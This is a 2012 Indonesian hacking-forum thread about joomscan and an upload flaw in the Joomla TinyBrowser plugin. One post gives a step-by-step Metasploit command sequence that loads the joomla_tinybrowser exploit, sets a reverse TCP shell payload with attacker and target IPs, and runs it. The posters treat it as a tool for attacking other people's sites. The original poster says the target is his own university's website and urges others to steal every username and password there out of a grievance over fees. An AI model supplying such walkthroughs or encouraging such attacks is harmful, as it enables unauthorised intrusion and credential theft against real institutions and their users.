Indonesian Back|Track Team
ASK TENTANG JOOMSCAN.PL - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html)
+--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html)
+---- Forum: BackTrack 5 (https://www.indonesianbacktrack.or.id/forum/forum-74.html)
+----- Forum: Backtrack 5 Tanya Jawab (https://www.indonesianbacktrack.or.id/forum/forum-86.html)
+----- Thread: ASK TENTANG JOOMSCAN.PL (/thread-1924.html)

Pages: 1 2 3 4


RE: ASK TENTANG JOOMSCAN.PL - THJC - 03-03-2012

Dilanjutkan saja diskusi ini Smile


RE: ASK TENTANG JOOMSCAN.PL - wine trochanter - 03-08-2012

(03-03-2012, 07:53 AM)THJC Wrote: Dilanjutkan saja diskusi ini Smile

ya ampunnn dilanjutkan??? tp gak da yg mau help help ni Angry


RE: ASK TENTANG JOOMSCAN.PL - tredz - 03-25-2012

http://www.exploit-db.com/exploits/16906/


RE: ASK TENTANG JOOMSCAN.PL - ekawithoutyou - 03-25-2012

(03-25-2012, 02:24 PM)tredz Wrote: http://www.exploit-db.com/exploits/16906/

wew exploit apa ni Tongue


RE: ASK TENTANG JOOMSCAN.PL - iKONspirasi - 03-25-2012

(03-25-2012, 05:49 PM)ekawithoutyou Wrote:
(03-25-2012, 02:24 PM)tredz Wrote: http://www.exploit-db.com/exploits/16906/

wew exploit apa ni Tongue

itu udh ada di metasploit kok, exploit buat upload file klo Joomla pake plugin TinyBrowser 1.5.12

di scan aja dulu, klo webnya pake plugin diatas tinggal setup metasploit dan siapkan file yg mau diupload (shell)


RE: ASK TENTANG JOOMSCAN.PL - fake666 - 03-25-2012

jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..


RE: ASK TENTANG JOOMSCAN.PL - iKONspirasi - 03-25-2012

(03-25-2012, 07:20 PM)fake666 Wrote: jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..

jalankan msfconsole, trus:
Code:
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST [MY IP ADDRESS]
msf exploit(joomla_tinybrowser) > set RHOST [TARGET IP]
msf exploit(joomla_tinybrowser) > exploit

ganti payload pake yg lain jg bisa, tergantung OS server sama aplikasi webnya

ayo dicoba, tapi jangan website dalam negeri ya Tongue


RE: ASK TENTANG JOOMSCAN.PL - fake666 - 03-25-2012

(03-25-2012, 08:13 PM)konspirasi Wrote:
(03-25-2012, 07:20 PM)fake666 Wrote: jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..

jalankan msfconsole, trus:
Code:
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST [MY IP ADDRESS]
msf exploit(joomla_tinybrowser) > set RHOST [TARGET IP]
msf exploit(joomla_tinybrowser) > exploit

ganti payload pake yg lain jg bisa, tergantung OS server sama aplikasi webnya

ayo dicoba, tapi jangan website dalam negeri ya Tongue
ini nih yg saya cari makasi banyak om konspirasi



RE: ASK TENTANG JOOMSCAN.PL - Junior Riau - 03-25-2012

hei ini website nya kampus wine trochunter wkwkw jangan dihajar ya kesiaaan Smile


RE: ASK TENTANG JOOMSCAN.PL - wine trochanter - 03-28-2012

(03-25-2012, 09:32 PM)junior.riau18 Wrote: hei ini website nya kampus wine trochunter wkwkw jangan dihajar ya kesiaaan Smile

hajarrrr aja dapatin pass n username semuanya,wkwkwkkw
ane lakukan ini buat pengetahuan dan kebaikan angkatan ku,soalnya apa kasihan kalo remed byar nya mahalllllllll terus mereka juga pelit,dan mempersulit para mahasiswanya #pengalaman ane Big Grin